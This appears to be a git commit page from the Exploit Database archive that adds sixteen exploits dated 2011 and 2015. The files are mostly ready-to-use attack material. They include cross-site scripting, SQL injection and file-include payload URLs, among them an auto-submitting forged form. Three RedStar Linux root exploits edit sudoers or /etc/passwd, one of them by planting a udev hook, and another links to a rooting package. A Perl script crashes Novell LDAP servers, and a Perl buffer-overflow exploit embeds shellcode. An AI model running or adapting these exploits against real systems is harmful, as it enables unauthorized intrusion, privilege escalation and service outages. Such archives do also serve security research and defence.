Update: 2015-01-12

16 new exploits
This commit is contained in:
Offensive Security 2015-01-12 10:44:13 +00:00
parent 65db7b92d6
commit 755f28d1d9
17 changed files with 302 additions and 0 deletions

View file

@ -32199,3 +32199,19 @@ id,file,description,date,author,platform,type,port
35739,platforms/php/webapps/35739.txt,"Argyle Social Multiple Cross Site Scripting Vulnerabilities",2011-05-12,"High-Tech Bridge SA",php,webapps,0
35740,platforms/windows/remote/35740.txt,"Microsoft .NET Framework JIT Compiler Optimization NULL String Remote Code Execution Vulnerability",2011-03-04,"Brian Mancini",windows,remote,0
35742,platforms/osx/local/35742.c,"OS X 10.9.x - sysmond XPC Privilege Escalation",2015-01-10,"Google Security Research",osx,local,0
35743,platforms/multiple/webapps/35743.txt,"Flash Tag Cloud And MT-Cumulus Plugin 'tagcloud' Parameter Cross-Site Scripting Vulnerability",2011-05-13,MustLive,multiple,webapps,0
35744,platforms/windows/remote/35744.pl,"AVS Ringtone Maker 1.6.1 '.au' File Remote Buffer Overflow Vulnerability",2011-05-16,KedAns-Dz,windows,remote,0
35745,platforms/php/webapps/35745.txt,"Joomla! 'com_cbcontact' Component 'contact_id' Parameter SQL Injection Vulnerability",2011-05-16,KedAns-Dz,php,webapps,0
35746,platforms/linux/local/35746.sh,"RedStar 3.0 Desktop - Privilege Escalation (Enable sudo)",2015-01-11,"prdelka & ?sfan55",linux,local,0
35748,platforms/linux/local/35748.txt,"RedStar 2.0 Desktop - Privilege Escalation (World-writeable rc.sysinit)",2015-01-11,prdelka,linux,local,0
35749,platforms/linux/local/35749.txt,"RedStar 3.0 Desktop - Privilege Escalation (Software Manager - swmng.app)",2015-01-11,RichardG,linux,local,0
35752,platforms/php/webapps/35752.txt,"Mambo 'com_docman' 1.3.0 Component Multiple SQL Injection Vulnerabilities",2011-05-16,KedAns-Dz,php,webapps,0
35753,platforms/multiple/dos/35753.pl,"Novell eDirectory 8.8 and Netware LDAP-SSL Daemon Denial Of Service Vulnerability",2011-05-16,Knud,multiple,dos,0
35754,platforms/php/webapps/35754.txt,"allocPSA 1.7.4 'login/login.php' Cross Site Scripting Vulnerability",2011-05-16,"AutoSec Tools",php,webapps,0
35755,platforms/php/webapps/35755.txt,"DocMGR 1.1.2 'history.php' Cross Site Scripting Vulnerability",2011-05-12,"AutoSec Tools",php,webapps,0
35756,platforms/php/webapps/35756.txt,"openQRM 4.8 'source_tab' Parameter Cross Site Scripting Vulnerability",2011-05-16,"AutoSec Tools",php,webapps,0
35757,platforms/php/webapps/35757.txt,"eFront <= 3.6.9 'scripts.php' Local File Include Vulnerability",2011-05-16,"AutoSec Tools",php,webapps,0
35758,platforms/asp/webapps/35758.txt,"Mitel Audio and Web Conferencing 4.4.3.0 Multiple Cross Site Scripting Vulnerabilities",2011-05-16,"Richard Brain",asp,webapps,0
35759,platforms/php/webapps/35759.txt,"eFront 3.6.9 'submitScore.php' Cross Site Scripting Vulnerability",2011-05-16,"John Leitch",php,webapps,0
35760,platforms/php/webapps/35760.txt,"PHP Calendar Basic 2.3 Multiple Cross Site Scripting Vulnerabilities",2011-05-17,"High-Tech Bridge SA",php,webapps,0
35761,platforms/php/webapps/35761.txt,"TWiki <= 5.0.1 'origurl' Parameter Cross Site Scripting Vulnerability",2011-05-18,"Mesut Timur",php,webapps,0

Can't render this file because it is too large.

13
platforms/asp/webapps/35758.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/47874/info
Mitel Audio and Web Conferencing is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Audio and Web Conferencing 4.4.3.0 is vulnerable; other versions may also be affected.
https://www.example.com/wd/wdinvite.asp?SID=&#039;><script>alert(1)</script>
https://www.example.com/wd/connect.asp?mode=joinmeeting&uid=&#039;><script>alert(1)</script>&sid=&#039;><script>alert(1)</script>
https://www.example.com/wd/applets/Error.asp?type=</span><script>alert(1)</script>

19
platforms/linux/local/35746.sh Executable file
View file

@ -0,0 +1,19 @@
#!/bin/bash -e
## Alternative steps: https://pbs.twimg.com/media/B68inqBIQAA5sK6.png
## Proof: https://github.com/HackerFantastic/Public/blob/master/exploits/redstar3.0-localroot.png
cp /etc/udev/rules.d/85-hplj10xx.rules /tmp/udevhp.bak
echo 'RUN+="/bin/bash /tmp/r00t.sh"' > /etc/udev/rules.d/85-hplj10xx.rules
cat <<EOF >/tmp/r00t.sh
echo -e "ALL\tALL=(ALL)\tNOPASSWD: ALL" >> /etc/sudoers
mv /tmp/udevhp.bak /etc/udev/rules.d/85-hplj10xx.rules
chown 0:0 /etc/udev/rules.d/85-hplj10xx.rules
rm /tmp/r00t.sh
EOF
chmod +x /tmp/r00t.sh
echo "sudo will be available after reboot"
sleep 2
reboot
## Source: https://twitter.com/sfan55/status/550348619652796416 & http://www.openwall.com/lists/oss-security/2015/01/09/6

12
platforms/linux/local/35748.txt Executable file
View file

@ -0,0 +1,12 @@
Red Star 2.0 desktop ships with a world-writeable "/etc/rc.d/rc.sysinit"
which can be abused to execute commands on
boot. An example exploitation of this vulnerability is shown here
https://github.com/HackerFantastic/Public/blob/master/exploits/redstar2.0-localroot.png
PoC:
/bin/echo "r00t::0:0::/tmp:/bin/bash" >> /etc/passwd
su - root
## Source: http://www.openwall.com/lists/oss-security/2015/01/09/6

16
platforms/linux/local/35749.txt Executable file
View file

@ -0,0 +1,16 @@
The root user is disabled on Red Star, and it doesn't look like there is a way to enable it.
UnFortunately, they left a big security hole: the Software Manager (swmng.app),
which runs as root through sudo and will install any RPM package, even if unsigned.
To get root, get this RPM package I made into Red Star through an ISO (if you're using a virtual machine) or USB key,
double-click it to open it with the Software Manager, and click through the blue buttons until its done.
After that, run rootsh to get a root shell.
Being a RedHat-based system (hinting on Fedora 15), SELinux will prevent you from doing some things,
but disabling it is a matter of running setenforce 0 as root.
Download: https://mega.co.nz/#!jgBT0RxZ!LQDEBBrbGxE6fag4d_A2C2cWj2PSNR_ZvnSW_UjRD5E
Mirror: http://www.exploit-db.com/sploits/redstarroot.rpm
## Source: http://richardg867.wordpress.com/2015/01/01/notes-on-red-star-os-3-0/ & http://www.openwall.com/lists/oss-security/2015/01/09/1

17
platforms/multiple/dos/35753.pl Executable file
View file

@ -0,0 +1,17 @@
source: http://www.securityfocus.com/bid/47858/info
Novell eDirectory and Netware are prone to a denial-of-service vulnerability.
Remote attackers can exploit this issue to cause a system-wide denial-of-service.
#!/usr/bin/perl
# usage: ./novell.pl 10.0.0.1 0x41424344
use IO::Socket::SSL;
$socket = new IO::Socket::SSL(Proto=>"tcp",
PeerAddr=>$ARGV[0], PeerPort=>636);
die "unable to connect to $host:$port ($!)\n" unless $socket;
print $socket "\x30\x84" . pack("N",hex($ARGV[1])) .
"\x02\x01\x01\x60\x09\x02\x01\x03\x04\x02\x44\x4e\x80\x00" ;
close $socket; print "done\n";

View file

@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/47845/info
The Flash Tag Cloud widget and the MT-Cumulus Plugin are prone to a cross-site scripting vulnerability because they fail to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker to steal cookie-based authentication credentials and to launch other attacks.
The following versions are affected:
Flash Tag Cloud For MT 4
MT-Cumulus 1.02 and prior versions
http://www.example.com/scripts/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
http://www.example.com/mt/mt-static/plugins/Cumulus/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

View file

@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/47856/info
The 'com_cbcontact' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/index.php?option=com_cbcontact&task=vcard&contact_id=-11[SQLi]
http://www.example.com/index.php?option=com_cbcontact&task=view&contact_id=-11[SQLi]

10
platforms/php/webapps/35752.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/47857/info
The 'com_docman' component for Mambo is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
'com_docman' 1.3 is vulnerable.
http://www.example.com/[path]/index.php?option=com_docman&task=cat_view&gid=3&Itemid=7&limit=-11[SQLi]
http://www.example.com/[path]/index.php?option=com_docman&task=cat_view&gid=3&Itemid=7&limit=15&limitstart=-11[SQLi]

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/47860/info
allocPSA is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
allocPSA 1.7.4 is vulnerable; other versions may also be affected.
http://www.example.com/allocPSA-1.7.4/login/login.php?sessID=%3Cscript%3Ealert%280%29%3C/script%3E

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/47861/info
DocMGR is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
DocMGR 1.1.2 is vulnerable; other versions may also be affected.
http://www.example.com/docmgr/history.php?f=0%22%29;}alert%280%29;{//

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/47865/info
openQRM is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
openQRM 4.8 is vulnerable; other versions may also be affected.
http://www.example.com/openqrm-4.8/src/plugins/zfs-storage/web/zfs-storage-action.php?source_tab="<script>alert(0)</script>

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/47870/info
eFront is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
eFront 3.6.9 build 10653 is vulnerable; other versions may also be affected.
http://www.example.com/efront/www/js/scripts.php?load=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/47877/info
eFront is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
eFront 3.6.9 build 10653 is vulnerable; other versions may also be affected.
http://www.example.com/efront/www/modules/module_crossword/app/submitScore.php?seq=<script>alert(0)</script>&cookie=<script>alert(0)</script>

27
platforms/php/webapps/35760.txt Executable file
View file

@ -0,0 +1,27 @@
source: http://www.securityfocus.com/bid/47887/info
PHP Calendar Basic is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
PHP Calendar Basic 2.3 is vulnerable; other versions may also be affected.
http://www.example.com/index.php?month=5"><script>alert(&#039;XSS&#039;)</script>&year=2011"><sc ript>alert(document.cookie)</script>
<form action="http://www.example.com/event_add.php?day=27&month=4&year=2011" method="post" name="main">
<input type="hidden" name="month" value="4">
<input type="hidden" name="day" value="27">
<input type="hidden" name="year" value="2011">
<input type="hidden" name="hour" value="20">
<input type="hidden" name="minute" value="00">
<input type="hidden" name="title" value="1<script>alert(&#039;XSS&#039;)</script>">
<input type="hidden" name="description" value="descr">
<input type="submit" id="btn" name="submit" value="Add Event">
</form>
<script>
document.getElementById(&#039;btn&#039;).click();
</script>
http://www.example.com/event_delete.php?day=28&month=4&year=2011&id=1"><script>alert(document.c ookie)</script>

12
platforms/php/webapps/35761.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/47899/info
TWiki is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Versions prior to TWiki 5.0.2 are vulnerable.
GET /twiki/bin/login/Sandbox/WebHome?%27%221=;origurl=1%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert%280x00039C%29%3C/script%3E
GET /twiki/bin/login/Sandbox/WebHome?sudo=sudo;origurl=http://10.1.10.128/bin/view/Main/TWikiAdminUser%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Ealert%280x00044C%29%3C%2Fscript%3E

View file

@ -0,0 +1,93 @@
source: http://www.securityfocus.com/bid/47851/info
AVS Ringtone Maker is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed exploit attempts may result in a denial-of-service condition.
AVS Ringtone Maker 1.6.1 is vulnerable; other versions may also be affected.
#!/usr/bin/perl
system("cls");
sub logo(){
print q'
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
1 ______ 0
0 .-" "-. 1
1 / KedAns-Dz \ =-=-=-=-=-=-=-=-=-=-=-| 0
0 Algerian HaCker | | > Site : 1337day.com | 1
1 --------------- |, .-. .-. ,| > Twitter : @kedans | 0
0 | )(_o/ \o_)( | > ked-h@hotmail.com | 1
1 |/ /\ \| =-=-=-=-=-=-=-=-=-=-=| 0
0 (@_ (_ ^^ _) HaCkerS-StreeT-Team 1
1 _ ) \_______\__|IIIIII|__/_______________________ 0
0 (_)@8@8{}<________|-\IIIIII/-|________________________> 1
1 )_/ \ / 0
0 (@ `--------` ? 2011, Inj3ct0r Team 1
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0
0 AVS Ringtone Maker 1.6.1 - SEH Overflow Exploit 1
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0
';
}
logo();
###
# Title : AVS Ringtone Maker 1.6.1 - SEH Overflow Exploit
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com | ked-h@exploit-id.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Web Site : www.1337day.com * www.exploit-id.com * www.09exploit.com
# Twitter page : twitter.com/kedans
# platform : windows
# Tested on : Windows XP sp3 FR
##
# Drag And Drop This File to edit Window & Start Upload >> Bo0M CalC !
###
my $junk = "\x41" x 4123 ; # Buffer Junk
my $jump = "\xeb\x06\x90\x90"; # Short Jump
my $eip = pack("V", 0x00401E3C); # EIP
my $seh = pack("V", 0x7C839AC0); # SEH
# windows/exec - 511 bytes ( http://www.metasploit.com)
# Encoder: x86/alpha_mixed
# EXITFUNC=seh, CMD=calc.exe
my $shellcode = "\xe8\x52\xe6\xff\xff\x90\x90".
"\x56\x54\x58\x36\x33\x30\x56\x58\x48\x34\x39\x48\x48\x48" .
"\x50\x68\x59\x41\x41\x51\x68\x5a\x59\x59\x59\x59\x41\x41" .
"\x51\x51\x44\x44\x44\x64\x33\x36\x46\x46\x46\x46\x54\x58" .
"\x56\x6a\x30\x50\x50\x54\x55\x50\x50\x61\x33\x30\x31\x30" .
"\x38\x39\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41" .
"\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42" .
"\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x49" .
"\x78\x4d\x59\x47\x70\x43\x30\x43\x30\x43\x50\x4e\x69\x49" .
"\x75\x46\x51\x4b\x62\x42\x44\x4e\x6b\x46\x32\x46\x50\x4c" .
"\x4b\x43\x62\x44\x4c\x4c\x4b\x42\x72\x47\x64\x4e\x6b\x51" .
"\x62\x51\x38\x44\x4f\x4e\x57\x43\x7a\x44\x66\x44\x71\x4b" .
"\x4f\x45\x61\x49\x50\x4c\x6c\x45\x6c\x43\x51\x51\x6c\x46" .
"\x62\x44\x6c\x51\x30\x49\x51\x48\x4f\x44\x4d\x47\x71\x49" .
"\x57\x4a\x42\x4c\x30\x42\x72\x50\x57\x4c\x4b\x51\x42\x44" .
"\x50\x4c\x4b\x51\x52\x45\x6c\x46\x61\x4e\x30\x4c\x4b\x47" .
"\x30\x50\x78\x4d\x55\x49\x50\x42\x54\x43\x7a\x43\x31\x4a" .
"\x70\x42\x70\x4c\x4b\x51\x58\x44\x58\x4e\x6b\x50\x58\x45" .
"\x70\x46\x61\x4e\x33\x48\x63\x45\x6c\x50\x49\x4c\x4b\x44" .
"\x74\x4c\x4b\x46\x61\x49\x46\x46\x51\x4b\x4f\x44\x71\x4f" .
"\x30\x4e\x4c\x49\x51\x48\x4f\x44\x4d\x43\x31\x48\x47\x45" .
"\x68\x49\x70\x42\x55\x49\x64\x43\x33\x51\x6d\x49\x68\x47" .
"\x4b\x43\x4d\x47\x54\x51\x65\x4a\x42\x51\x48\x4c\x4b\x42" .
"\x78\x51\x34\x47\x71\x4b\x63\x50\x66\x4c\x4b\x44\x4c\x50" .
"\x4b\x4c\x4b\x50\x58\x47\x6c\x43\x31\x4a\x73\x4c\x4b\x43" .
"\x34\x4e\x6b\x45\x51\x4a\x70\x4b\x39\x47\x34\x51\x34\x44" .
"\x64\x51\x4b\x43\x6b\x43\x51\x46\x39\x50\x5a\x42\x71\x4b" .
"\x4f\x4b\x50\x51\x48\x43\x6f\x42\x7a\x4e\x6b\x45\x42\x4a" .
"\x4b\x4f\x76\x51\x4d\x50\x6a\x46\x61\x4c\x4d\x4f\x75\x48" .
"\x39\x43\x30\x43\x30\x45\x50\x42\x70\x50\x68\x46\x51\x4e" .
"\x6b\x42\x4f\x4e\x67\x49\x6f\x4a\x75\x4d\x6b\x49\x6e\x44" .
"\x4e\x46\x52\x4a\x4a\x51\x78\x4e\x46\x4a\x35\x4d\x6d\x4f" .
"\x6d\x49\x6f\x4a\x75\x45\x6c\x46\x66\x51\x6c\x44\x4a\x4f" .
"\x70\x49\x6b\x49\x70\x42\x55\x46\x65\x4f\x4b\x50\x47\x45" .
"\x43\x51\x62\x42\x4f\x43\x5a\x43\x30\x42\x73\x49\x6f\x4e" .
"\x35\x42\x43\x45\x31\x50\x6c\x51\x73\x44\x6e\x43\x55\x51" .
"\x68\x50\x65\x47\x70\x41\x41";
my $exploit = $junk.$jump.$eip.$seh.$shellcode;
open (FILE ,'> KedAns.wav');
print FILE $exploit;